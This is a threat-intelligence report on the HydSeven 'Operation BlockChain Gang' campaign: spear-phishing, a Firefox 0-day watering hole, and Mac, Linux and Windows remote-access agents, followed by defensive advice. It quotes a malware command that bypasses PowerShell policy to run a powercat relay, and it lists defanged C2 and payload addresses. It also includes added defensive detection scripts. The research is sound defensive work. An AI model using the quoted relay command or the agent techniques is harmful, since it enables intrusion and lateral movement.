Threat Summary: Operation BlockChain Gang; Advanced Exploits, Commodity Tools

Executive Summary

The research team at Prevailion has detected and analyzed Linux and Windows remote-access trojans associated with the advanced threat actor known as “HydSeven.” This threat group initially maintained a relatively low profile through the use of bespoke commodity malware. However, they caught the attention of the information security community when performing a highly targeted spear-phishing operation in the summer of 2019.

In this campaign, which we have dubbed “Operation BlockChain Gang,” the threat actors used compromised Cambridge University infrastructure to phish and water-hole their targets. In analyzing the campaign, Prevailion has associated two new malware families with this group. In addition to the previously known Mac OS X agent, we’ve recently analyzed the Windows and Linux variants.

By illustrating how potential victims could have been infected by the group and detailing the capabilities of the malware, this report is intended to inform at-risk organizations and help them understand appropriate steps to avoid compromise.

Campaign Overview

HydSeven appears to add a new twist to a common method of infection via email, known as “phishing.” While this particular technique is not new, victims rarely report actual interactions with threat actors. In this case, the threat actors crafted an innocuous email asking if the target would be willing to look over some applications for an award presumably in their area of expertise. In a statement about the attack, CoinBase reported, “We learned that over 200 individuals were targeted by this attacker.”

It wasn’t until after the victim responded, indicating that they would be willing to help, that they were sent the malicious link. That link would bring the victim to a threat actor-controlled “watering-hole” hostname on the Cambridge University domain. If someone visited this website from a Firefox browser, their host machine would be exploited by what was a 0-day exploit, later identified as CVE-2019-11707 and CVE-2019-11708. However, the actors did appear to make one small mistake at first; they did not add a message saying that the webpage could only be rendered in Firefox. Thus, some potential victims were saved from compromise simply because they used their default browser. If someone was unfortunate enough to have visited the website using Firefox, they would have been exploited, and an agent would have been deployed to their workstation.

While other researchers have previously documented the functionality of the Mac OS X payload, Prevailion has, with moderate confidence, associated a Windows and a Linux component with this threat actor. We speculate that the threat actors likely did not go through the effort to obtain certificates for Mac OS X and Linux payloads, as those systems are less likely to have antivirus software running on them. These payloads were fully functional remote-access tools that allowed the threat actors to run commands, as well as send and receive data from their command and control servers (C2s).

This case study shows the lengths these advanced actors would go to establish access in a high-value network. Based off that same CoinBase report, it was calculated that only 2.5% of people who received the initial email received that final link. This would suggest that the threat actors expended all this effort to gain access to approximately five organizations, potentially in the financial sector.

This report highlights the emphasis that threat actors are placing on organizations that store and retain significant amounts of data about their customer base. We strongly encourage these organizations to assess their existing risk profiles, implement host-based defenses, and put incident response plans in place prior to an event.

Initial Contact

According to a presentation given in October 2019 by a Line employee, potential victims of this campaign received a targeted email from a compromised Cambridge account asking them to “assess the quality of competing projects … for the [Cambridge University] Adam’s Prize.” The Adam’s Prize is a highly respected contest, held every year by Cambridge and awarded to a person, or persons, who contributed original research to a given discipline, typically within the field of mathematics.

The initial email appeared innocuous at first glance, asking recipients if they would be willing to help evaluate applications for the Adam’s award. These threat actors even went through the process of creating a LinkedIn account for the persona that sent the emails. While creating a fake profile has become typical of targeted attacks, corresponding with the victims was highly abnormal. In this particular case, correspondence went back and forth — with victims inquiring about requirements and terms of participation — but the link to the water-holed hostname was still not sent until the victim agreed to help. This unique tactic reveals that the threat actors are expanding the social engineering aspect and displaying a level of audacity far beyond the norm.

The email contained a link with a unique username and password for the victim. The webpage seemed innocuous, with only one suspicious aspect: a message indicating that the page would only work when viewed in Firefox with a link to download the latest version. We speculate that the actors added this particular message after reading an article such as this one, by Robert Heaton. When Heaton visited the water-holed site, he did not get the Firefox prompt. In his words:

if “Gregory” had added just 7 extra words to this page – “THIS PAGE MUST BE VIEWED IN FIREFOX” – I would have been screwed.


Around the same time, May 20, 2019, CoinBase experienced a similar attack. This was first reported by @SecurityGuyPhil, in a series of tweets. Those tweets were later turned into a Medium post, which can be found here.

The CoinBase story was identical to what transpired at Line, when victims received emails from a presumably compromised account associated with Cambridge. Only after the user interacted with the threat actor and expressed a willingness to help did they receive the malicious link. If the victim visited the water-holed website from a Firefox browser, it would call a malicious JavaScript file from the domain analyticsfit[.]com/init.js that was hosted on the IP address 54[.]38[.]93[.]182.

The Firefox Exploit

Once the victim clicked on the link or visited the website with the correct browser and operating system, it would trigger the malicious JavaScript hosted on analyticsfit[.]com. The first exploit, CVE-2019-11707, allowed the program to crash in a certain way, which was discovered and documented. The second exploit, CVE-2019-11708, would allow remote code execution on the compromised victim’s machine. Both CVEs were reported by Samuel Groß of Google Project Zero. On his Twitter account, Samuel stated the following about the vulnerability:

“So all in all this looks like a bug collision (not a 1day constructed from the bugfix, not a leak from any of the bug trackers). My guess is that someone was looking for that bug pattern or even specifically for a variant of CVE-2019-[9810] and found the bug that way”

Based upon Prevailion’s analysis, the exploit would not allow for remote code execution on Chrome due to Chrome’s use of a different JavaScript engine.

MacOS Agent

Once the exploit was run, the code would obtain the first-stage agent from the C2 server, located at hxxp://185[.]162[.]131[.]96/i/IconServicesAgent. This agent was analyzed extensively in a series of blog posts by Digita Security, in which it was identified as a variant of “NetWire.” A commercially available “systems administration tool”, NetWire can be purchased online at a rate of $120 per year. Despite its low cost, cracked versions of this software are also available to download for free on the internet.

Of note, while NetWire is commercially available, the sample had a low detection rate when originally submitted to VirusTotal on June 2, 2019. At that time, it was flagged as malicious by only one vendor. Since then, though, several companies have created signatures for this tool. In the course of our investigation, we identified two new samples associated with this group. Interestingly, one was named “fuck_tencent” — potentially a reference to the Chinese conglomerate Tencent Holdings Ltd.

Once installed on the victim machine, the application masqueraded as the “Finder” application. It then attempted to gather host-based credentials and establish persistence. After gathering host-based information and presumably determining that the environment was of interest, it would install the second, more robust payload, later identified as “Ekoms”. Digita Security performed an extensive write-up on this sample, as well, which can be found here.

Like most second-stage remote-access trojans, it would allow the threat actor to deploy keyloggers, grab screenshots, transfer files, and send audio captures. As with the previous tool, when this sample was submitted to VirusTotal, it was not flagged as malicious by any AV vendors. Initial detection rate for the Ekoms sample was 0/53 when uploaded on June 20, 2019.

Analysis of Linux Agent

During our investigation, the Prevailion team found three ELF files designed for Linux-based operating systems. Like most of the Mac samples, when the file was initially uploaded to VirusTotal, it had a detection rate of zero. And, even as of November 10, it’s only being detected by three vendors.

Initial detection rate of 0/53 for the Linux agent uploaded on March 29th, 2019

The first agent we analyzed was a fully functional remote-access trojan designed for Red-Hat Linux. We hypothesize that the infection mechanism was similar to the one used to deploy the MacOS agent. Once the agent was sent to the machine, it would install itself as a desktop application.

Screenshot of the RC4 embedded within the sample

As in the aforementioned Mac samples, it contained the same RC4 encryption key, used to decrypt a section of code containing the C2 IP address, Host-ID, and Default Group that would be set by the threat actor.

Decrypted output of the encrypted code

When we analyzed this agent, it would gather the machine’s current IP address by making a request to checkip[.]dyndns[.]org. The agent had the ability to gather information about the victim machine and send various commands. Some examples include retrieving:

  • Information about the user (getuid, getpwuid)
  • Information about the host (gethostname, sysinfo, sysconf, cpuinfo)
  • Information about environment variables (getenv)
  • Information about process and the parent process
  • Run commands (from /bin/bash or /bin/sh)
  • Read, write, and delete files
  • Make and remove directories
  • Kill a process

The agent would persist by auto-starting on login. The functionality suggested its primary purpose was to act as a proxy, or relay, to send commands and data from the threat actors outside the network to other agents within the network. One particular aspect of the agent was the use of a hard-coded user-agent string:

“Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko”

This was of particular note, as the agent was designed for Linux, but this was the typical user-agent string for a Windows operating system version 8.1 or Server 2012.
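The mismatch described above can be hunted for in web-proxy logs. The following is an added example, not Prevailion's tooling: it flags requests whose User-Agent claims an OS that contradicts the asset inventory for the source host, and enriches hits with the report's exact User-Agent and the checkip.dyndns.org lookup. The log layout, inventory, IP addresses and function names are constructed assumptions.

```python
import re
from collections import namedtuple
from urllib.parse import urlsplit

# User-Agent the report quotes as hard-coded in the Linux agent.
REPORT_UA = "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko"
IP_LOOKUP_HOST = "checkip.dyndns.org"  # public-IP lookup the agent performed

# Constructed asset inventory (assumption): source IP -> installed OS family.
INVENTORY = {"10.0.5.21": "linux", "10.0.5.22": "windows", "10.0.5.23": "linux"}

# Constructed proxy log, one request per line: ts src method url "user-agent"
SAMPLE_LOG = f'''\
2019-06-18T09:01:12Z 10.0.5.21 GET http://checkip.dyndns.org/ "{REPORT_UA}"
2019-06-18T09:01:40Z 10.0.5.22 GET http://intranet.example/ "{REPORT_UA}"
2019-06-18T09:02:03Z 10.0.5.23 GET http://checkip.dyndns.org/ "curl/7.61.1"
2019-06-18T09:02:55Z 10.0.5.23 GET http://mirror.example/repo "Mozilla/5.0 (X11; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0"
2019-06-18T09:03:10Z 10.0.5.21 POST http://198.51.100.7/ "{REPORT_UA}"
'''

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')
Finding = namedtuple("Finding", "ts src url reasons")

def ua_os_family(ua):
    """OS family a User-Agent claims, or None for tools such as curl."""
    if "Windows NT" in ua:
        return "windows"
    if "Macintosh" in ua:
        return "macos"
    if "Linux" in ua or "X11" in ua:
        return "linux"
    return None

def find_ua_mismatches(log_text, inventory):
    """Flag requests whose claimed OS contradicts the inventory for that host."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip malformed lines rather than guessing at fields
        ts, src, _method, url, ua = m.groups()
        claimed, actual = ua_os_family(ua), inventory.get(src)
        if claimed is None or actual is None or claimed == actual:
            continue  # no OS claim, unknown host, or a consistent claim
        reasons = ["ua-os-mismatch"]
        if ua == REPORT_UA:
            reasons.append("report-ua")   # exact string from the report
        if urlsplit(url).hostname == IP_LOOKUP_HOST:
            reasons.append("ip-lookup")   # same lookup service the agent used
        findings.append(Finding(ts, src, url, reasons))
    return findings

if __name__ == "__main__":
    for f in find_ua_mismatches(SAMPLE_LOG, INVENTORY):
        print(f.ts, f.src, f.url, ",".join(f.reasons))
```

The same User-Agent from the Windows host is not flagged, since it is a legitimate Internet Explorer 11 string there; the signal is the contradiction with the host's real OS, not the string itself.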

Analysis of the Windows Agent

While the previous case studies provided insight into how the threat actor operated in the MacOS environment, pivoting on those same C2s led us to another campaign from earlier this year. The two IP addresses referenced in the CoinBase targeting were:

  • 185[.]162[.]131[.]96
  • 89[.]34[.]111[.]113

Vitali Kremez, @VK_Intel, later noted that he found a signed Windows binary, with the certificate being issued to “SANJ CONSULTING LTD”. Once the binary was analyzed, it communicated with the same C2 as the MacOS malware from the CoinBase attack.

“cmd.exe /c powershell; Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process -Force;. “%s”; powercat -l -p 4000 -r tcp:;

goto :loop”

This binary was a compiled version of PowerCat, an open-source framework written in PowerShell. We have associated additional PowerCat samples with the same threat group. However, they were not signed by a certificate authority. To avoid detection based on common strings, they used an obfuscator such as “Invoke-Obfuscation”. PowerCat is a fully functional remote-access trojan that:

  • Uploads and downloads files
  • Executes PowerShell commands
  • Includes DNSCat2 functionality as an alternative communications channel
  • Acts as a relay to other agents inside the network perimeter

Another notable feature of these agents was their ability to act as a relay. This is significant because once the threat actors have access to a relay on the network behind the firewall, there are typically few, if any, appliances in place to detect the lateral movement of the actor. These relay agents allow the threat actors to access more sensitive data hosted on servers that are only accessible once a client has been authenticated and permitted into the local network.

Overlap with Previous Campaigns

One other significant element was the use of a common RC4 key across the Windows, Linux, and Mac-based samples. The use of this shared RC4 key and overlapping C2s led us to believe, with moderate confidence, that all these samples can be associated to the same threat actor. This threat actor group has previously been reported upon as being active in both Japan and Poland.
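The linkage reasoning above, and the config decryption described for the Linux agent, sketched as an added example (not Prevailion's tooling): one recovered RC4 key is tried against each sample's encrypted configuration block, and samples that decrypt to a well-formed config are linked and grouped by C2. The key, blobs, sample names and the `c2=…;host_id=…;group=…` layout are constructed for illustration; the report does not publish the real key or config format.

```python
import re

def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); decryption is the same operation as encryption."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)

KNOWN_KEY = b"constructed-demo-key"   # placeholder, NOT the key from the samples

# Constructed encrypted config blobs, standing in for bytes carved from samples.
SAMPLES = {
    "macos_sample": rc4(KNOWN_KEY, b"c2=192.0.2.10:443;host_id=HostId-A;group=Default"),
    "linux_sample": rc4(KNOWN_KEY, b"c2=192.0.2.10:443;host_id=HostId-B;group=Default"),
    "windows_sample": rc4(KNOWN_KEY, b"c2=192.0.2.44:8080;host_id=HostId-C;group=Default"),
    "unrelated_sample": rc4(b"some-other-key", b"c2=203.0.113.5:80;host_id=X;group=Y"),
}

# Assumed plaintext layout; a wrong key yields bytes that will not match it.
CONFIG_RE = re.compile(
    rb"^c2=(\d{1,3}(?:\.\d{1,3}){3}:\d+);host_id=([\w-]+);group=([\w-]+)$")

def link_samples(samples, key):
    """Return {name: config} for samples whose blob decrypts cleanly with key."""
    linked = {}
    for name, blob in samples.items():
        m = CONFIG_RE.match(rc4(key, blob))
        if m:
            c2, host_id, group = (g.decode() for g in m.groups())
            linked[name] = {"c2": c2, "host_id": host_id, "group": group}
    return linked

def group_by_c2(linked):
    """Map each C2 endpoint to the sorted sample names that share it."""
    by_c2 = {}
    for name, cfg in linked.items():
        by_c2.setdefault(cfg["c2"], []).append(name)
    return {c2: sorted(names) for c2, names in by_c2.items()}

if __name__ == "__main__":
    print(group_by_c2(link_samples(SAMPLES, KNOWN_KEY)))
```

A clean decrypt under one key is evidence of a shared builder or codebase, and C2 overlap strengthens it; neither alone establishes a common operator, which is why the report rates the association at moderate confidence.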


This threat actor has showcased a number of techniques that would categorize them as an extremely advanced adversary. This campaign highlights the focus on large organizations that store and retain significant amounts of data about their customer base.

Large crypto exchanges, corporations, and other organizations storing sensitive customer information should continuously assess their risk profiles and employ host-based defenses on their systems. For example, while the MacOS agent was initially undetected by AV, the use of a personal firewall — such as LuLu for Mac or iptables for Linux — would have alerted the user to an outbound connection. And, when browsing the internet, users can mitigate risk by making use of NoScript, a plugin that blocks all JavaScript, Java, and Flash unless explicitly allowed by the user.

While there is currently no single solution to protect every system with 100% fidelity, these products can significantly reduce risk by displaying a pop-up to alert the end user about activity in the background of their system. This gives them a greater opportunity to at least detect abnormalities and potentially avoid a breach.

Organizations should also work on preparing and rehearsing their incident response plans. Thus, if an event does occur, they will have an established procedure regarding who to contact and what to do. Furthermore, in an incident response investigation, it is critical to check the entire network, not just the machines where an alert was detected. This includes Linux-based workstations and servers, as these systems sometimes get overlooked. If you feel that your Linux-based system may have been compromised, guidelines on how to inspect that system can be found here.

While it’s important to have a security team on staff, the end user is always your first line of defense to detect suspicious activity. For example, if someone receives an email asking them to evaluate an international award in economics, and they are not an economist, they should consult their network security staff. If you have host-based firewalls in place and a user suddenly starts seeing a pop-up message about a cURL command connecting to a server in Hong Kong, there may be an issue at hand. Training your employees to take these alerts seriously could prevent a major incident from occurring.

Indicators of Compromise

The following is a list of samples that have been associated with this threat group. This list was compiled from information provided by Prevailion employees and the open source community.

Sending Emails



Exploit Server



Mac Agents





Linux Agents




Windows Agents









IP Addresses











Copyright 2021 Prevailion, Inc. All rights reserved.    
